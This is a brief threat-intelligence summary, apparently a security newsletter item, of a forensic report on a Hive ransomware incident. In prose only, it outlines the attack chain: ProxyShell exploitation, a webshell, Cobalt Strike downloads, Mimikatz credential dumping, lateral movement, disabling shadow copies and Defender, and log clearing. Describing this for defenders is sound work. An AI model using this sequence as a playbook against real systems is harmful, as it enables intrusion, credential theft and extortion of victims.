Hive Ransomware Attack Analysis

  |  Source: 

Hive Ransomware Attack Analysis

The Varonis Forensics Team has provided an investigation from an incident involving Hive ransomware, spanning under 72 hours to execute. The initial attack began by exploiting the Exchange Proxyshell vulnerability to load a webshell on the Exchange server. Following initial access, PowerShell invoke-expression commands were executed to download payloads for Cobalt Strike. To achieve persistence, the attackers created a new user account and dumped credentials using Mimikatz. With credentials obtained, the attackers moved laterally within the environment using mstsc.exe and initiated discovery with ping sweep and a network scanning tool, SoftPerfect. Data from scanned systems and credentials collected were saved to a text file. In the final stages of the attack, the threat actors executed the ransomware disabling volume shadow copies, stopping services including Windows Defender, and cleaning Windows Security logs. The ransomware-as-a-service was first observed in June 2021 targeting sectors in healthcare, nonprofits, retailers, energy providers among others.


Get trending threats published weekly by the Anvilogic team.

Sign Up Now